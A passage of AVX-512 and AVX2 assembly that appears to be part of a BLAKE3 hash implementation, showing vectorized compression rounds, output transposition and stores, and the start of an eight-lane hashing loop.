vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm31
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm25
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm30
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm19
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm26
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm20
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpxord zmm0, zmm0, zmm8
vpxord zmm1, zmm1, zmm9
vpxord zmm2, zmm2, zmm10
vpxord zmm3, zmm3, zmm11
vpxord zmm4, zmm4, zmm12
vpxord zmm5, zmm5, zmm13
vpxord zmm6, zmm6, zmm14
vpxord zmm7, zmm7, zmm15
movzx eax, byte ptr [rbp+0x38]
jne 9b
mov rbx, qword ptr [rbp+0x50]
vpunpckldq zmm16, zmm0, zmm1
vpunpckhdq zmm17, zmm0, zmm1
vpunpckldq zmm18, zmm2, zmm3
vpunpckhdq zmm19, zmm2, zmm3
vpunpckldq zmm20, zmm4, zmm5
vpunpckhdq zmm21, zmm4, zmm5
vpunpckldq zmm22, zmm6, zmm7
vpunpckhdq zmm23, zmm6, zmm7
vpunpcklqdq zmm0, zmm16, zmm18
vpunpckhqdq zmm1, zmm16, zmm18
vpunpcklqdq zmm2, zmm17, zmm19
vpunpckhqdq zmm3, zmm17, zmm19
vpunpcklqdq zmm4, zmm20, zmm22
vpunpckhqdq zmm5, zmm20, zmm22
vpunpcklqdq zmm6, zmm21, zmm23
vpunpckhqdq zmm7, zmm21, zmm23
vshufi32x4 zmm16, zmm0, zmm4, 0x88
vshufi32x4 zmm17, zmm1, zmm5, 0x88
vshufi32x4 zmm18, zmm2, zmm6, 0x88
vshufi32x4 zmm19, zmm3, zmm7, 0x88
vshufi32x4 zmm20, zmm0, zmm4, 0xDD
vshufi32x4 zmm21, zmm1, zmm5, 0xDD
vshufi32x4 zmm22, zmm2, zmm6, 0xDD
vshufi32x4 zmm23, zmm3, zmm7, 0xDD
vshufi32x4 zmm0, zmm16, zmm17, 0x88
vshufi32x4 zmm1, zmm18, zmm19, 0x88
vshufi32x4 zmm2, zmm20, zmm21, 0x88
vshufi32x4 zmm3, zmm22, zmm23, 0x88
vshufi32x4 zmm4, zmm16, zmm17, 0xDD
vshufi32x4 zmm5, zmm18, zmm19, 0xDD
vshufi32x4 zmm6, zmm20, zmm21, 0xDD
vshufi32x4 zmm7, zmm22, zmm23, 0xDD
vmovdqu32 zmmword ptr [rbx], zmm0
vmovdqu32 zmmword ptr [rbx+0x1*0x40], zmm1
vmovdqu32 zmmword ptr [rbx+0x2*0x40], zmm2
vmovdqu32 zmmword ptr [rbx+0x3*0x40], zmm3
vmovdqu32 zmmword ptr [rbx+0x4*0x40], zmm4
vmovdqu32 zmmword ptr [rbx+0x5*0x40], zmm5
vmovdqu32 zmmword ptr [rbx+0x6*0x40], zmm6
vmovdqu32 zmmword ptr [rbx+0x7*0x40], zmm7
vmovdqa32 zmm0, zmmword ptr [rsp]
vmovdqa32 zmm1, zmmword ptr [rsp+0x1*0x40]
vmovdqa32 zmm2, zmm0
vpaddd zmm2{k1}, zmm0, dword ptr [ADD16+rip] {1to16}
vpcmpltud k2, zmm2, zmm0
vpaddd zmm1 {k2}, zmm1, dword ptr [ADD1+rip] {1to16}
vmovdqa32 zmmword ptr [rsp], zmm2
vmovdqa32 zmmword ptr [rsp+0x1*0x40], zmm1
add rdi, 128
add rbx, 512
mov qword ptr [rbp+0x50], rbx
sub rsi, 16
cmp rsi, 16
jnc 2b
test rsi, rsi
jnz 3f
4:
vzeroupper
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 6
3:
test esi, 0x8
je 3f
vpbroadcastd ymm0, dword ptr [rcx]
vpbroadcastd ymm1, dword ptr [rcx+0x4]
vpbroadcastd ymm2, dword ptr [rcx+0x8]
vpbroadcastd ymm3, dword ptr [rcx+0xC]
vpbroadcastd ymm4, dword ptr [rcx+0x10]
vpbroadcastd ymm5, dword ptr [rcx+0x14]
vpbroadcastd ymm6, dword ptr [rcx+0x18]
vpbroadcastd ymm7, dword ptr [rcx+0x1C]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x20]
mov r13, qword ptr [rdi+0x28]
mov r14, qword ptr [rdi+0x30]
mov r15, qword ptr [rdi+0x38]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
2:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x80]
cmove eax, ebx
mov dword ptr [rsp+0x88], eax
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x40], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x40]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x40], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x40], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x40]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x40], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm16, ymm12, ymm14, 136
vshufps ymm17, ymm12, ymm14, 221
vshufps ymm18, ymm13, ymm15, 136
vshufps ymm19, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x30]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x30], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x30], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x30]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x30], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x30], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm20, ymm12, ymm14, 136
vshufps ymm21, ymm12, ymm14, 221
vshufps ymm22, ymm13, ymm15, 136
vshufps ymm23, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x20], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x20]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x20], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x20], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x20]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x20], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm24, ymm12, ymm14, 136
vshufps ymm25, ymm12, ymm14, 221
vshufps ymm26, ymm13, ymm15, 136
vshufps ymm27, ymm13, ymm15, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x10]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x10], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x10], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x10]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x10], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x10], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm28, ymm12, ymm14, 136
vshufps ymm29, ymm12, ymm14, 221
vshufps ymm30, ymm13, ymm15, 136
vshufps ymm31, ymm13, ymm15, 221
vpbroadcastd ymm8, dword ptr [BLAKE3_IV_0+rip]
vpbroadcastd ymm9, dword ptr [BLAKE3_IV_1+rip]
vpbroadcastd ymm10, dword ptr [BLAKE3_IV_2+rip]
vpbroadcastd ymm11, dword ptr [BLAKE3_IV_3+rip]
vmovdqa ymm12, ymmword ptr [rsp]
vmovdqa ymm13, ymmword ptr [rsp+0x40]
vpbroadcastd ymm14, dword ptr [BLAKE3_BLOCK_LEN+rip]
vpbroadcastd ymm15, dword ptr [rsp+0x88]
vpaddd ymm0, ymm0, ymm16
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm20
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm17
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm21
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm24
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm28
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm25
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm29
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm18
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm23
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm22
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm16
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm17
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm25
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm27
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm30
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm19
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm29
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm20
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm18
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm22
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm27
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm21
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm31
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm26
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm30
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm23
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm19
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm20
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm21
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm16
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm24
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm28
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm31
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
